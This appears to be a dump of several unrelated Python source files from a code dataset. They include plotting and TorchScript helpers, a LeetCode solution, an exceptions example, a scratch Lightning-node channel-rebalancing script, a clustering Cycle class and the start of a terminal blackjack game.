plt.imshow(psnr_nx_array[0:100,:],aspect='auto',cmap='magma')\nplt.colorbar(psnr_img1)\nplt.savefig(folder_name+'psnr_nx.png')\nplt.close(fig3)\n\nfig4 = plt.figure()\nplt.title('PSNR')\nplt.xticks()\nplt.xlabel('time frame')\nplt.yticks()\nplt.ylabel('iterations')\npsnr_img2 = plt.imshow(psnr_nnx_array[0:100,:],aspect='auto',cmap='magma')\nplt.colorbar(psnr_img2)\nplt.savefig(folder_name+'psnr_nnx.png')\nplt.close(fig4)\n\n","sub_path":"XCAT/Plot/metric_plot100.py","file_name":"metric_plot100.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171944462","text":"# BSD 3-Clause License\n#\n# Copyright (c) 2017 xxxx\n# All rights reserved.\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# ============================================================================\n\nimport torch\n\n@torch.jit.script\ndef slice_helper(x, offset):\n return x[:, -offset: , : ]\n\n@torch.jit.script\ndef slice_helper2(x: torch.Tensor, start: torch.Tensor, end: torch.Tensor):\n start = start.long()\n end = end.long()\n return x[:, start:end]\n\n@torch.jit.script\ndef slice_helper3(x, start):\n return x[:, start:]\n\n@torch.jit.script\ndef get_item(x):\n item = x.detach().item()\n output = torch.tensor(item)\n return output\n\n@torch.jit.script\ndef get_next_cache_start(required_cache_size: torch.Tensor, xs: torch.Tensor):\n next_cache_start = 0\n if required_cache_size < 0:\n next_cache_start = 0\n elif required_cache_size == 0:\n next_cache_start = xs.size(1)\n else:\n if xs.size(1) - required_cache_size < 0:\n next_cache_start = 0\n else:\n next_cache_start = xs.size(1) - required_cache_size\n return torch.tensor(next_cache_start, dtype=torch.int64)\n","sub_path":"ACL_PyTorch/contrib/audio/WeNet/slice_helper.py","file_name":"slice_helper.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"624942900","text":"class Solution(object):\n def increasingTriplet(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n n_len = len(nums)\n if n_len < 3:\n return False\n ptr1, ptr2 = 0, 1\n i = 2\n cur_min_idx = None\n while i < n_len:\n if nums[ptr1] < nums[ptr2] < nums[i]:\n return True\n if cur_min_idx != None and nums[i] > nums[cur_min_idx]:\n if nums[ptr1] >= nums[ptr2] or nums[i] < nums[ptr2]:\n ptr1, ptr2 = cur_min_idx, i\n i += 1\n continue\n if nums[i] < nums[ptr1] and nums[i] < nums[ptr2]:\n if cur_min_idx == None or nums[i] < nums[cur_min_idx]:\n cur_min_idx = i\n i += 1\n continue\n if nums[ptr1] < nums[ptr2]:\n if nums[ptr2] > nums[i] and nums[ptr1] < nums[i]:\n ptr2 = i\n else:\n ptr1, ptr2 = ptr2, i\n i += 1\n return False\n","sub_path":"normal/334_increasing_triplet_subsequence.py","file_name":"334_increasing_triplet_subsequence.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"532481424","text":"\"\"\"\nExceptions are part of the API\n\ncallers need to know what \"exceptions\" to expect, and when.\n\n\"\"\"\nimport sys\n\n\ndef sqrt(x):\n \"\"\"Compute square roots using the method of Heron of Alexandria.\n\n Args:\n x: The number for which the square root is to be computed.\n\n Returns:\n The square root of x.\n\n Raises:\n ValueError: If x is negative\n \"\"\"\n if x < 0:\n raise ValueError(\"Cannot compute square root of a negative number {}\".format(x))\n\n guess = x\n i = 0\n while guess * guess != x and i < 20:\n guess = (guess + x / guess) / 2.0\n i += 1\n return guess\n\n\ndef main():\n try:\n print(sqrt(9))\n print(sqrt(2))\n print(sqrt(-1))\n print(\"This is never printed\")\n except ValueError as e: # ValueError excepted from the sqrt 
function. And therefore catching it.\n print(e, file=sys.stderr)\n\n print(\"Program execution continues normally here.\")\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\"\"\"Output is clean\n3.0\n1.414213562373095\nCannot compute square root of a negative number -1\nProgram execution continues normally here.\n\"\"\"","sub_path":"pythonIntermediate/e.handling-exceptions/exceptions_api_wellBefore.py","file_name":"exceptions_api_wellBefore.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"132501058","text":"from lnd_rest import *\nimport code\nimport pandas\nimport pyqrcode\n\npandas.set_option(\"display.max_colwidth\", None)\npandas.set_option(\"display.max_rows\", None)\n\nqrdata = getNewAddress()\nprint(f\"Creating code for address: {qrdata}\")\nqr = pyqrcode.create(qrdata)\nprint(qr.terminal(quiet_zone=1))\n\nprint(\n pyqrcode.create(\"\".upper(), version=17, mode=\"alphanumeric\").terminal(quiet_zone=1)\n)\n\n\ndef rebalance_script():\n a = listChannels()\n a = a[a[\"active\"] == True]\n pl = []\n bcount = 0\n while len(a[a[\"local_balance\"] < 500000]) > 0:\n a = listChannels()\n a = a[a[\"active\"] == True]\n taker = a[\"tobalance\"].idxmax()\n giver = a[\"tobalance\"].idxmin()\n oid = a.loc[giver].chan_id\n pk = a.loc[taker].remote_pubkey\n # Divide it down to smaller chunks for cheaper fees\n pay_piece = int(a.loc[taker].tobalance / 3)\n if pay_piece < 75000:\n pay_piece = int(a.loc[taker].tobalance)\n print(f\"Sending {pay_piece} from {a.loc[giver].alias} to {a.loc[taker].alias}!\")\n result = rebalance(pay_piece, oid, pk, 5000, force=True)\n pl.append(result)\n bcount += 1\n print(f\"Rebalanced {bcount} times!\")\n return pl\n\n\ndef inflows():\n a = getForwards(60)\n in_oids = a[\"chan_id_in\"].unique()\n df = pandas.DataFrame()\n for edge in in_oids:\n try:\n df = df.append(getChanPolicy(edge))\n except Exception as e:\n print(f\"Edge Not Found: {e}\")\n df = df.reset_index()\n df = df.drop([\"index\"], axis=1)\n return df[df[\"pubkey\"] != getMyPk()]\n\n\ndef outflows():\n a = getForwards(60)\n out_oids = a[\"chan_id_out\"].unique()\n df = pandas.DataFrame()\n for edge in out_oids:\n try:\n df = df.append(getChanPolicy(edge))\n except Exception as e:\n print(f\"Edge Not Found: {e}\")\n df = df.reset_index()\n df = df.drop([\"index\"], axis=1)\n return df[df[\"pubkey\"] != getMyPk()]\n\n\ndef flowsort():\n c = listChannels()\n fin = inflows()\n fout = outflows()\n in_nodes = set(fin.pubkey)\n out_nodes = set(fout.pubkey)\n routing_nodes = in_nodes.intersection(out_nodes)\n in_nodes = in_nodes - routing_nodes\n out_nodes = out_nodes - routing_nodes\n c[c[\"remote_pubkey\"].isin(list(routing_nodes))]\n return in_nodes, routing_nodes, out_nodes\n\n\ndef findBadNodes():\n a = getForwards()\n forwarding_nodes = set(a.tail(500).chan_id_in).union(set(a.tail(500).chan_id_out))\n all_chan_ids = set(listChannels().chan_id)\n bad_node_ids = all_chan_ids.difference(forwarding_nodes)\n badnodelist = listChannels(all=True).query(\"chan_id.isin(@bad_node_ids)\")\n\n\ndef test1():\n a = getForwards()\n fwd_in = list(a.query(\"dts.str.contains('2020-07-13')\").chan_id_in)\n fwd_out = list(a.query(\"dts.str.contains('2020-07-13')\").chan_id_out)\n print(\"In-Nodes: \")\n listChannels().query(\"chan_id.isin(@fwd_in)\")\n print(\"Out-Nodes: \")\n listChannels().query(\"chan_id.isin(@fwd_out)\")\n\n\n# Delete me\ndepleted = listChannels().query(\n \"local_balance < 400000 and active == True and 
capacity > 1000000\"\n)\nnum_depleted = depleted.shape[0]\n\nglut = listChannels().query(\n \"remote_balance < 400000 and active == True and capacity > 1000000\"\n)\nnum_glut = glut.shape[0]\n\n# oid =\n# lh =\nrebalance(100000, oid, lh, 8000, force=True)\n\n\ndef rebalancePartners():\n partners = []\n mypk = getMyPK()\n hop1_partners = getNodeChannels(mypk)\n count = 0\n for z in hop1_partners.iterrows():\n hop1_pk = z[1].item()\n hop2_partners = getNodeChannels(hop1_pk)\n for y in hop2_partners.iterrows():\n hop2_pk = y[1].item()\n hop3_partners = getNodeChannels(hop2_pk)\n for x in hop3_partners.iterrows():\n hop3_pk = x[1].item()\n count += 1\n print(f\"Searched {count} nodes\")\n if hop3_pk == mypk:\n partners.append((hop1_pk, hop2_pk, hop3_pk))\n return partners\n\n\nfh_pk = \"031d2bbc75802689312220a017c6b51fa246efc59c7aa9355f6f7395038ffb4d6a\"\nlh_pk = \"02f3069a342ae2883a6f29e275f06f28a56a6ea2e2d96f5888a3266444dcf542b6\"\n\n# disabled == False and\ndef rebalancePartners2():\n partners = []\n mypk = getMyPK()\n fh_pk = \"\"\n hop1_partners = getNodeChannels2(mypk)\n # hop1_partners = hop1_partners.query(\"fee_rate_milli_msat < 15\").head(100)\n count = 0\n lh_pk = \"021c97a90a411ff2b10dc2a8e32de2f29d2fa49d41bfbb52bd416e460db0747d0d\"\n for z in hop1_partners.pubkey.values:\n # print(z)\n hop1_pk = z\n try:\n hop2_partners = getNodeChannels2(hop1_pk)\n hop2_partners = hop2_partners.query(\"fee_rate_milli_msat < 5\").head(100)\n # print(hop2_partners)\n except Exception as e:\n continue\n for y in hop2_partners.pubkey.values:\n try:\n # print(y)\n hop2_pk = y\n hop3_partners = getNodeChannels2(hop2_pk)\n hop3_partners = hop3_partners.query(\"fee_rate_milli_msat < 5\").head(100)\n count += 1\n print(f\"Searched {count} nodes\")\n if mypk in hop3_partners.pubkey.values and hop2_pk == lh_pk:\n print(getAlias(hop3_pk))\n partners.append((hop1_pk, hop2_pk, mypk))\n except Exception as e:\n continue\n for x in hop3_partners.pubkey.values:\n try:\n # print(y)\n hop3_pk = x\n hop4_partners = getNodeChannels2(hop3_pk)\n hop4_partners = hop3_partners.query(\"fee_rate_milli_msat < 5\").head(\n 100\n )\n count += 1\n print(f\"Searched {count} nodes\")\n if mypk in hop4_partners.pubkey.values and hop3_pk == lh_pk:\n print(getAlias(hop3_pk))\n partners.append((hop1_pk, hop2_pk, hop3_pk, mypk))\n except Exception as e:\n continue\n\n #### Rebalance Algorithm recursive\n #### START Find circular routes:\n mypk = getMyPK()\n firsthop_pk = \"03d606331f19b2500f88bc373cc830492736a7d4be6ecc6cc770e0014e94ee0f58\"\n lasthop_pk = \"02f3069a342ae2883a6f29e275f06f28a56a6ea2e2d96f5888a3266444dcf542b6\"\n\n all_routes = []\n route = []\n route.append(firsthop_pk)\n hoplist = getNodeChannels2(firsthop_pk)\n rroute = check_circular(hoplist, lasthop_pk, route)\n\n\ndef check_circular(hoplist, lasthop_pk, route, depth=0):\n depth = depth + 1\n check_filter = hoplist.query(\"pubkey == @lasthop_pk\")\n print(check_filter)\n code.interact(local=locals())\n # Found a circular route\n if not check_filter.empty:\n return route.append(check_filter.pubkey.item())\n # Not a full loop, interate again\n else:\n for i in list(hoplist.pubkey):\n hoplist = getNodeChannels2(i)\n return check_circular(hoplist, lasthop_pk, route, depth)\n\n\n#### END\n\n\n#### Rebalance Algorithm for-loop\n#### START Find circular routes:\nmypk = getMyPK()\nfirsthop_pk = \"03d606331f19b2500f88bc373cc830492736a7d4be6ecc6cc770e0014e94ee0f58\"\nlasthop_pk = \"02f3069a342ae2883a6f29e275f06f28a56a6ea2e2d96f5888a3266444dcf542b6\"\n\nall_routes = []\nroute 
= []\n# All routes start with the first-hop\nroute.append(firsthop_pk)\n\n\ndef check_circular(hoppk, lasthop_pk, route, depth=0):\n hoplist = getNodeChannels2(hoppk)\n check_filter = hoplist.query(\"pubkey == @lasthop_pk\")\n if not check_filter.empty:\n route.append(check_filter.pubkey.item())\n # Append mypk to end of route\n route.append(mypk)\n return route\n else:\n return None\n\n\nfound_aroute = check_circular(firsthop_pk, lasthop_pk, route)\nif found_aroute != None:\n all_routes.append(found_aroute)\nelse:\n # Didnt find lasthop, search through next nodes channels\n for node in list(hoplist.pubkey):\n found_aroute = check_circular(node, lasthop_pk, [*route, node])\n if found_aroute != None:\n all_routes.append(found_aroute)\n else:\n # Didnt find lasthop, search through next nodes channels\n for node in list(hoplist.pubkey):\n found_aroute = check_circular(firsthop_pk, lasthop_pk, [*route, node])\n\n\n#### END\n\n\nb = pandas.DataFrame(partners)\nb.columns = [\"one\", \"two\", \"three\"]\nb[\"oid\"] = b.one.apply(lambda x: getAlias(x))\nb[\"lh\"] = b.two.apply(lambda x: getAlias(x))\nhops = list(b.iloc[0][[\"one\", \"two\", \"three\"]])\nr = buildRoute(hops, 100000)\ninvoice = addInvoice(100000, \"test\")\npprint(sendRoute(invoice[\"r_hash\"], r))\n\n\ninvoice = addInvoice(balance_amt, \"test\")\n\n\noinv = openInvoices()\noinv.query(\"memo == 'balance'\").sort_values(\"value_msat\")\n\n\nlistChannels(all=True).query(\n \"capacity >= 1000000 and balanced > 0.8 and active == True\"\n)[[\"alias\", \"chan_id\", \"remote_pubkey\", \"balanced\"]]\n\n\nasync def lc():\n ws = await websockets.connect(\n \"wss://10.0.0.111:8080/v2/wallet/address/next?method=POST\",\n ping_timeout=None,\n ping_interval=1,\n ssl=ssl_context,\n extra_headers=headers,\n max_size=1000000000,\n )\n await ws.send(json.dumps({}).encode(\"UTF-8\"))\n hi = await ws.recv()\n print(hi)\n async for message in ws:\n print(\"receiving\")\n try:\n hi = await asyncio.wait_for(ws.recv(), timeout=5)\n hi = json.loads(hi)\n # hi = hi['result']\n pprint(hi)\n except asyncio.TimeoutError:\n print(\"timeout!\")\n except asyncio.CancelledError:\n print(\"cancelled?\")\n\n\nasync def blockstream():\n ws = await websockets.connect(\n \"wss://10.0.0.111:8080/v2/chainnotifier/register/blocks?method=POST\",\n ping_timeout=None,\n ping_interval=20,\n ssl=ssl_context,\n extra_headers=headers,\n max_size=1000000000,\n )\n print(\"waiting\")\n await asyncio.sleep(1)\n print(\"priming\")\n await ws.send(\n json.dumps(\n {\n \"height\": 641549,\n \"hash\": base64.b64encode(\n b\"000000000000000000100a0cdd08a73ebf397c0f0d261d7877c3c55b4bfb4e94\"\n ).decode(),\n }\n ).encode(\"UTF-8\")\n )\n async for message in ws:\n print(\"receiving\")\n try:\n hi = await asyncio.wait_for(ws.recv(), timeout=60)\n hi = json.loads(hi)\n hi = hi[\"result\"]\n await ws.ping()\n pprint(hi)\n except asyncio.TimeoutError:\n print(\"timeout!\")\n except asyncio.CancelledError:\n print(\"cancelled?\")\n\n\ndef async_layer():\n asyncio.run(main())\n\n\n# async thread\n\n\nasync def fetch(client):\n print(\"fetch\")\n async with client.get(\n \"wss://10.0.0.111:8080/v2/router/htlcevents?method=GET\", ssl=ssl_context\n ) as resp:\n print(\"get!\")\n return await resp.text()\n\n\nasync def main():\n async with aiohttp.ClientSession(headers=headers) as client:\n print(\"starting\")\n html = await fetch(client)\n print(html)\n\n\nx = threading.Thread(target=async_layer, daemon=True)\nx.start()\n\n# Get channels and fees\nz = listGetChannelFees()\n# Get low fee 
destinations with low balance\ny = z.query(\"fee_rate_milli_msat <= 10 and active == True\").sort_values(\n [\"balanced\"], ascending=[1]\n)\n\n\noid = \"694266826229022721\"\nlh = \"022b213281fad5065c66ed53a53198a04b4cb528ce92d76ed0175471b93f1db74f\"\na, b, c, d = rebalance(100000, oid, lh, 4500, force=True)\n\n\ndef multibalance(d):\n global oid\n global lh\n hops = list(d.pub_key)\n for i, row in (\n openInvoices()\n .query(\"memo == 'balance'\")\n .sort_values(\"value_msat\")[::-1]\n .iterrows()\n ):\n try:\n rhash = row[\"r_hash\"]\n balance_amt = int(row[\"value_msat\"] / 1000)\n print(f\"Balancing: {balance_amt}\")\n r = buildRoute(hops, balance_amt)\n pprint(sendRoute(rhash, r))\n listChannels().query(\n \"chan_id.str.contains(@oid) or remote_pubkey.str.contains(@lh)\"\n )\n except Exception as e:\n print(e)\n\n\ndef resetInvoices():\n # Reset buffer of invoices\n oinv = openInvoices()\n need = set({100000, 200000, 300000, 400000, 500000}) - set(\n (\n oinv.query(\"memo == 'balance'\").sort_values(\"value_msat\").value_msat / 1000\n ).astype(int)\n )\n for val in need:\n print(f\"Adding Amount: {val}\")\n addInvoice(val, \"balance\")\n\n\nt = rebalancePartners()\nb = pandas.DataFrame(t)\nb.columns = [\"one\", \"two\", \"three\"]\nb.query(\n \"one == '02875ac2c27835990ef62e5755c34264b2c39f51a41525adc5e52a7f94b3a19f8b'\"\n).two.apply(lambda x: getAlias(x))\nhops = list(b.iloc[1429])\nr = buildRoute(hops, 100000)\ninvoice = addInvoice(100000, \"test\")\npprint(sendRoute(invoice[\"r_hash\"], r))\n\n\navail_routes = b.query(\n \"one == '02875ac2c27835990ef62e5755c34264b2c39f51a41525adc5e52a7f94b3a19f8b'\"\n).two.apply(lambda x: getAlias(x))\navail_index = avail_routes.index\n\n\n# Get channels and fees\nz = listGetChannelFees()\n# Get low fee destinations with low balance\ny = z.query(\"fee_rate_milli_msat <= 10 and active == True\").sort_values(\n [\"balanced\"], ascending=[1]\n)\n\nlow_fee_fh_pk = list(y[60:73].remote_pubkey)\nlow_fee_lh_pk = list(y[0:12].remote_pubkey)\n\navail_routes = b.query(\"one.isin(@low_fee_fh_pk) and two.isin(@low_fee_lh_pk)\")\navail_index = avail_routes.index\n\n\ninvoice = addInvoice(200000, \"test\")\nfee_sum = 0\nfor h in avail_index:\n hops = list(b.iloc[h])\n try:\n r = buildRoute(hops, 200000)\n if int(r[\"total_fees_msat\"]) / 1000 > 4:\n print(\"FEE TOO HIGH!\")\n continue\n except Exception as e:\n print(f\"build route error: {hops} {h}\")\n continue\n pay = sendRoute(invoice[\"r_hash\"], r)\n # pprint(pay)\n if \"error\" in pay:\n pprint(pay)\n if pay[\"status\"] == \"SUCCEEDED\":\n invoice = addInvoice(200000, \"test\")\n print(\"Success!\\n\")\n fees = float(pay[\"route\"][\"total_fees_msat\"]) / 1000\n print(fees)\n fee_sum += fees\n print(listChannels().query(\"remote_pubkey.isin(@hops)\"))\n for i in hops:\n getAlias(i)\n\n # cont = input('continue?')\n # if not cont.startswith('y'):\n # \tbreak\n\n# Only need to do these once\npk = getMyPK()\nc = listChannels()\n\n# Find channels with higher fee rate than mine\nchans = []\nfor cid in c.chan_id:\n policy = getChanPolicy(cid)\n my_fee_rate = int(policy.query(\"pubkey == @pk\").fee_rate_milli_msat.item())\n their_fee_rate = int(policy.query(\"pubkey != @pk\").fee_rate_milli_msat.item())\n if their_fee_rate > my_fee_rate:\n chans.append(cid)\n\nlistChannels().query(\"chan_id.isin(@chans)\")\n\n\n# Update the channel\ncid = \"\"\ngetChanPolicy(cid)\nupdateChanPolicy(\n chan_point=CID2CP(cid), fee_rate=0.000275, base_fee_msat=300, tld=40, min_htlc=None\n)\ngetChanPolicy(cid)\n\n\n# Check 
Result\nlistChannels().query(\"chan_id == '683535592764866560'\")\n\nif __name__ == \"__main__\":\n code.interact(local=locals())\n","sub_path":"lnd_pyshell/data_science.py","file_name":"data_science.py","file_ext":"py","file_size_in_byte":15074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"489346839","text":"from collections import defaultdict\n\nfrom noise_robust_cobras.noise_robust.datastructures.constraint import Constraint\nfrom noise_robust_cobras.noise_robust.datastructures.constraint_index import (\n ConstraintIndex,\n)\n\n\nclass Cycle:\n \"\"\"\n A class that represents a valid constraint cycle\n attributes:\n - constraints: a list of constraints the way they appear in the cycle (starts at a random point in the cycle)\n - sorted_constraints: a tuple of constraints that is sorted for __eq__ and __hash__\n - number_of_CLs: the number of CL constraints in this cycle\n \"\"\"\n\n def __init__(self, constraints, composed_from=None, number_of_CLs=None):\n assert Cycle.is_valid_constraint_set_for_cycle(constraints)\n self.constraints = set(constraints)\n self.sorted_constraints = Cycle.sort_constraints(constraints)\n self.composed_from = set(composed_from) if composed_from is not None else {self}\n if number_of_CLs is None:\n self.number_of_CLs = sum(\n 1 for constraint in constraints if constraint.is_CL()\n )\n else:\n self.number_of_CLs = number_of_CLs\n\n @staticmethod\n def compose_multiple_cycles_ordered(cycles):\n composed_cycle = cycles[0]\n for to_compose in cycles[1:]:\n composed_cycle = composed_cycle.compose_with(to_compose)\n if composed_cycle is None:\n break\n return composed_cycle\n\n @staticmethod\n def compose_multiple_cycles(cycles):\n composed_constraints = set(cycles[0].constraints)\n composed_from = set(cycles[0].composed_from)\n for to_compose in cycles[1:]:\n composed_constraints.symmetric_difference_update(to_compose.constraints)\n composed_from.symmetric_difference_update(to_compose.composed_from)\n if not Cycle.is_valid_constraint_set_for_cycle(composed_constraints):\n return None\n return Cycle(composed_constraints, composed_from=composed_from)\n\n @staticmethod\n def make_cycle_from_raw_cons(raw_constraints):\n constraints = Constraint.raw_constraints_to_constraints(raw_constraints)\n return Cycle(constraints)\n\n @staticmethod\n def cycle_from_instances(instances):\n instances = [int(i) for i in instances]\n raw_constraints = list(zip(instances[:-1], instances[1:])) + [\n (instances[0], instances[-1])\n ]\n return Cycle.make_cycle_from_raw_cons(raw_constraints)\n\n @staticmethod\n def cycle_from_instances_constraint_index(instances, constraint_index):\n instances = [int(i) for i in instances]\n raw_constraints = list(zip(instances[:-1], instances[1:])) + [\n (instances[0], instances[-1])\n ]\n return Cycle(constraint_index.instance_tuples_to_constraints(raw_constraints))\n\n @staticmethod\n def is_valid_constraint_set_for_cycle(constraints):\n if len(constraints) == 0:\n return False\n # check if each instance occurs twice\n count = defaultdict(lambda: 0)\n for constraint in constraints:\n count[constraint.i1] += 1\n count[constraint.i2] += 1\n for key, value in count.items():\n if value != 2:\n return False\n\n # check if all constraints are connected\n all_sets = []\n for constraint in constraints:\n found_sets = [\n s for s in all_sets if constraint.i1 in s or constraint.i2 in s\n ]\n if len(found_sets) == 0:\n all_sets.append({constraint.i1, constraint.i2})\n elif len(found_sets) == 1:\n 
found_sets[0].update(constraint.get_instance_tuple())\n elif len(found_sets) == 2:\n found_sets[0].update(found_sets[1])\n all_sets.remove(found_sets[1])\n return len(all_sets) == 1\n\n def is_valid_cycle(self):\n return Cycle.is_valid_constraint_set_for_cycle(self.constraints)\n\n def get_sorted_constraint_list(self):\n \"\"\"\n\n :return: a list of all constraints in the order by which they appear in the cycle with an arbitrary starting constraints\n \"\"\"\n all_constraints = list(self.constraints)\n start_constraint = all_constraints[0]\n temp_index = ConstraintIndex()\n for constraint in all_constraints[1:]:\n temp_index.add_constraint(constraint)\n\n current_list = [(start_constraint.get_instance_tuple(), start_constraint)]\n current_instance = start_constraint.i2\n while len(temp_index.constraints) > 0:\n matching_constraints = temp_index.find_constraints_for_instance(\n current_instance\n )\n if len(matching_constraints) == 1:\n matching_constraint = list(matching_constraints)[0]\n else:\n raise Exception(\"Not a valid cycle!\")\n\n other_instance = matching_constraint.get_other_instance(current_instance)\n current_list.append(\n ((current_instance, other_instance), matching_constraint)\n )\n current_instance = other_instance\n temp_index.remove_constraint(matching_constraint)\n\n # check if the cycle is complete\n if start_constraint.i1 != current_instance:\n raise Exception(\"Not a valid cycle!\")\n\n return current_list\n\n def compose_with(self, other_cycle):\n if len(self.constraints.intersection(other_cycle.constraints)) == 0:\n return None\n new_constraints = set(self.constraints).symmetric_difference(\n other_cycle.constraints\n )\n if len(new_constraints) == 0:\n return None\n if not Cycle.is_valid_constraint_set_for_cycle(new_constraints):\n return None\n new_cycle = Cycle(\n new_constraints,\n other_cycle.composed_from.symmetric_difference(self.composed_from),\n )\n return new_cycle\n\n def replace_constraint(self, old_constraint, new_constraint):\n assert old_constraint in self.constraints\n new_constraints = set(self.constraints)\n new_constraints.remove(old_constraint)\n new_constraints.add(new_constraint)\n return Cycle(new_constraints)\n\n @staticmethod\n def sort_constraints(constraints):\n return tuple(sorted(constraints))\n\n def is_useful(self):\n return self.number_of_CLs <= 2\n\n def is_inconsistent(self):\n return self.number_of_CLs == 1\n\n def __iter__(self):\n return self.constraints.__iter__()\n\n def __len__(self):\n return len(self.constraints)\n\n def __eq__(self, other):\n if other == None:\n return False\n return self.sorted_constraints == other.sorted_constraints\n\n def __contains__(self, item):\n return item in self.constraints\n\n def __hash__(self):\n return hash(self.sorted_constraints)\n\n def __repr__(self):\n return str(self)\n\n def __str__(self):\n # return \",\".join([str(constraint) for constraint in self.constraints])\n return \",\".join([str(con) for _, con in self.get_sorted_constraint_list()])\n","sub_path":"noise_robust_cobras/noise_robust/datastructures/cycle.py","file_name":"cycle.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"458999677","text":"import os\nimport sys\nimport random\nimport click\n\n__author__ = \"Andrew Hariri\"\n__email___ = \"hariria@usc.edu\"\n\n# Ascii inpsired by @see https://codereview.stackexchange.com/questions/82103/ascii-fication-of-playing-cards\n\nblackjackASCII = \"\"\"\n$$$$$$$\\ $$\\ $$$$$$\\ 
$$$$$$\\ $$\\ $$\\ $$$$$\\ $$$$$$\\ $$$$$$\\ $$\\ $$\\ \n$$ __$$\\ $$ | $$ __$$\\ $$ __$$\\ $$ | $$ | \\__$$ |$$ __$$\\ $$ __$$\\ $$ | $$ |\n$$ | $$ |$$ | $$ / $$ |$$ / \\__|$$ |$$ / $$ |$$ / $$ |$$ / \\__|$$ |$$ / \n$$$$$$$\\ |$$ | $$$$$$$$ |$$ | $$$$$ / $$ |$$$$$$$$ |$$ | $$$$$ / \n$$ __$$\\ $$ | $$ __$$ |$$ | $$ $$< $$\\ $$ |$$ __$$ |$$ | $$ $$< \n$$ | $$ |$$ | $$ | $$ |$$ | $$\\ $$ |\\$$\\ $$ | $$ |$$ | $$ |$$ | $$\\ $$ |\\$$\\ \n$$$$$$$ |$$$$$$$$\\ $$ | $$ |\\$$$$$$ |$$ | \\$$\\\\$$$$$$ |$$ | $$ |\\$$$$$$ |$$ | \\$$\\ \n\\_______/ \\________|\\__| \\__| \\______/ \\__| \\__|\\______/ \\__| \\__| \\______/ \\__| \\__|\n\"\"\"\n\nclass Card:\n\n # Constructor for card, takes a value and suit\n def __init__(self, valueAndSuit):\n self.value = valueAndSuit[0:valueAndSuit.find(\":\")]\n self.suit = valueAndSuit[valueAndSuit.find(\":\") + 1:]\n self.largeCard = []\n self.setLargeCard()\n if (self.suit == \"♠\"):\n self.suitString = \"spades\"\n elif (self.suit == \"♦\"):\n self.suitString = \"diamonds\"\n elif (self.suit == \"♥\"):\n self.suitString = \"hearts\"\n else:\n self.suitString = \"clubs\"\n\n # gets the value\n def getValue(self):\n return self.value\n \n # Prints a large version of the card\n def setLargeCard(self):\n self.largeCard.append('┌─────────┐')\n self.largeCard.append(f'│{\"1\" if self.value == \"10\" else \" \"}{\"0\" if self.value == \"10\" else self.value} │') \n self.largeCard.append('│ │')\n self.largeCard.append('│ │')\n self.largeCard.append(f'│ {self.suit} │')\n self.largeCard.append('│ │')\n self.largeCard.append('│ │')\n self.largeCard.append(f'│ {\"1\" if self.value == \"10\" else \" \"}{\"0\" if self.value == \"10\" else self.value} │')\n self.largeCard.append('└─────────┘')\n\n # Prints \n def printLargeCard(self):\n for x in self.largeCard:\n print(x)\n \n # Get numerical value of the card\n def getNumValue(self):\n if (self.value.isnumeric()):\n return int(self.value)\n elif (self.value == \"A\"):\n return 1\n else:\n return 10\n \n # print card as a message\n def printCardString(self):\n print(self.value + \" of \" + self.suitString)\n\n # announce card \n def sayCard(self):\n os.system(f\"say {self.printCardString()}\")\n\n\n# Method to initialize the deck with 52 unique cards\ndef initializeDeck():\n deck = []\n cardValues = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\n suits = ['♠', '♦', '♥', '♣']\n for cardValue in cardValues:\n for suit in suits:\n deck.append(cardValue + \":\" + suit)\n return deck\n\n# Print the deck\ndef printDeck(deck):\n for x in range(0, 9):\n for card in deck:\n print(card.largeCard[x] + \" \", end=\"\")\n print(\"\")\n\n# Print the dealer deck\ndef printDealerDeck(deck):\n for x in range(0, 9):\n index = 0\n while(index != len(deck)):\n if (index == 0):\n print(\"***********\" + \" \", end=\"\")\n else:\n print(deck[index].largeCard[x] + \" \", end=\"\")\n index += 1\n print(\"\")\n\n\n\n# core play logic function\ndef playLogic():\n print(\"hello and welcome to blackjack\")\n while(input(\"press 'q' to quit or any other key to continue: \") != 'q'):\n deck = initializeDeck()\n userHand = []\n userNumAces = 0\n userTotal 